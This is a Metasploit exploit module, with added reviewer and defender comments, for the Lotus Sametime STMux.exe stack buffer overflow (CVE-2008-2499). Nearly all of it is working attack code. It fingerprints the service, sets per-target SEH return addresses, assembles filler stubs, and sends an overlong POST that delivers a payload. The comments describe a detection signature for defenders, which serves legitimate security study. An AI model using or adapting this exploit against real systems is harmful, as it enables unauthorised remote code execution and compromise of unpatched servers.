##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2008-2499 (OSVDB 45610, BID 29328, ZDI-08-028): a stack
# buffer overflow in the Sametime Multiplexer (STMux.exe) of IBM Lotus Domino
# Sametime 7.5 / 7.5.1 / 8.0.0 on Windows, reached over plain TCP (RPORT default
# 1533) with an HTTP-shaped request to /CommunityCBR.
#
# Defender notes: both `check` and `exploit` send requests carrying the
# User-Agent "Sametime Community Agent". The exploit request line is a POST to
# /CommunityCBR/CC.39.<several hundred bytes, partly non-ASCII>/ with no HTTP
# version token; that shape is a usable wire signature for IDS/WAF rules.
# The only remediation is the vendor fix tracked by the references below; every
# listed target platform (Windows 2000 / 2003) is long end-of-life.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata (name, references, payload constraints, targets)
  # and the single module option RPORT (default 1533).
  #
  # @param info [Hash] metadata merged by the framework through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow',
      # NOTE(review): inside %q{} the backslash before the apostrophe is kept
      # literally, so the rendered description reads "Domino\'s". Cosmetic only;
      # fixing it means changing the string, which this comment-only pass does not do.
      'Description'    => %q{
          This module exploits a stack buffer overflow in Lotus Domino\'s Sametime
        Server. By sending an overly long POST request to the Multiplexer
        STMux.exe service we are able to overwrite SEH. Based on the exploit
        by Manuel Santamarina Suarez.
      },
      'Author'         => [ 'aushack', 'riaf <riaf[at]mysec.org>' ],
      'Arch'           => [ ARCH_X86 ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-2499' ],
          [ 'OSVDB', '45610' ],
          [ 'BID', '29328' ],
          [ 'ZDI', '08-028' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Payload'        =>
        {
          'Space'    => 1024,
          # NUL, LF and CR: the request built in exploit() is CRLF-delimited text.
          'BadChars' => "\x00\x0a\x0d",
          'StackAdjustment' => -3500,
        },
      'Platform'       => ['win'],
      # Every target shares the same 'Ret' address; the 'Offset' pair is consumed
      # in exploit() as repeat counts for the two assembled filler stubs.
      'Targets'        =>
        [
          # Patrick - Tested OK against Windows 2003 SP1 20081114
          [ 'Lotus Sametime 7.5 on Windows Server 2000 SP4',     { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 268 ] }], # pop ecx, pop ecx, ret msvcr71.dll
          [ 'Lotus Sametime 7.5 on Windows Server 2003 SP1',     { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 269 ] }], # pop ecx, pop ecx, ret msvcr71.dll
          [ 'Lotus Sametime 7.5 on Windows Server 2003 SP2',     { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
          [ 'Lotus Sametime 7.5.1 Windows Server 2003 SP2',      { 'Ret' => 0x7c3410c2, 'Offset' => [ 5, 269 ] }],
          [ 'Lotus Sametime 8.0.0 Windows Server 2003 SP2',      { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
        ],
      'DisclosureDate' => '2008-05-21',
      'DefaultTarget'  => 1))

    register_options(
      [
        Opt::RPORT(1533),
      ])
  end

  # Fingerprints the service without sending the overflow.
  #
  # Two short exchanges on fresh connections: a HEAD / whose reply must contain
  # "Lotus-Domino", then a GET /CommunityCBR whose reply must contain "200 OK".
  # No version information is read, so a positive result is presence only.
  #
  # @return [Exploit::CheckCode] Detected when both markers are seen (not proof
  #   of vulnerability); Safe in every other case, including a non-Domino host
  def check
    connect

    req = "HEAD / HTTP/1.1\r\n"
    req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
    req << "User-Agent: Sametime Community Agent\r\n\r\n"

    sock.put(req)
    res = sock.get_once || '' # get_once may yield nil on an empty read; '' keeps the match below safe

    disconnect

    if (res.to_s =~/Lotus-Domino/)
      connect

      req = "GET /CommunityCBR HTTP/1.1\r\n"
      req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
      req << "User-Agent: Sametime Community Agent\r\n\r\n"
      sock.put(req)
      res = sock.get_once || ''

      disconnect

      if (res.to_s =~ /200 OK/)
        return Exploit::CheckCode::Detected
      end
    end

    return Exploit::CheckCode::Safe
  end

  # Sends the single overlong POST described in the module metadata, then hands
  # off to the payload handler.
  #
  # The request path is built from random lower-case filler, the target's 'Ret'
  # address packed as a 32-bit little-endian value, and two one-instruction
  # stubs assembled with Metasm and repeated per the target's 'Offset' pair.
  # The concatenation order is part of the exploit as the author wrote it.
  # No response is read: outcome is observed by the handler, not by this method.
  def exploit
    connect

    pad1 = rand_text_alpha_lower(44)
    pad2 = rand_text_alpha_lower(29)

    # Both stubs are assembled with Metasm (the original "we should use Metasm"
    # note predates this code); 'Offset'[0] repeats "pop ebx", 'Offset'[1] "popad".
    popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * target['Offset'][0]
    popad = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset'][1]
    esp = "\xff\x24\x24" # dword ptr ss:[esp]
    jmp = "\x74\x23" + "\x75\x21" # je short, jnz short
    seh = [target['Ret']].pack('V') # 32-bit little-endian

    path = pad1 + jmp + seh + pad2 + popebx + popad + esp

    # Request line carries no HTTP version token; the long, partly non-ASCII path
    # after "/CommunityCBR/CC.39." is what a detection rule would key on.
    req = "POST /CommunityCBR/CC.39.#{path}/\r\n"
    req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
    req << "User-Agent: Sametime Community Agent\r\n"
    # NOTE(review): String#length, not bytesize — equal only while payload.encoded
    # is a binary (ASCII-8BIT) string, which is presumably the case here.
    req << "Content-Length: #{payload.encoded.length}\r\n"
    req << "Connection: Close\r\n"
    req << "Cache-Control: no-cache\r\n\r\n"
    req << payload.encoded

    sock.put(req)

    handler
    disconnect
  end
end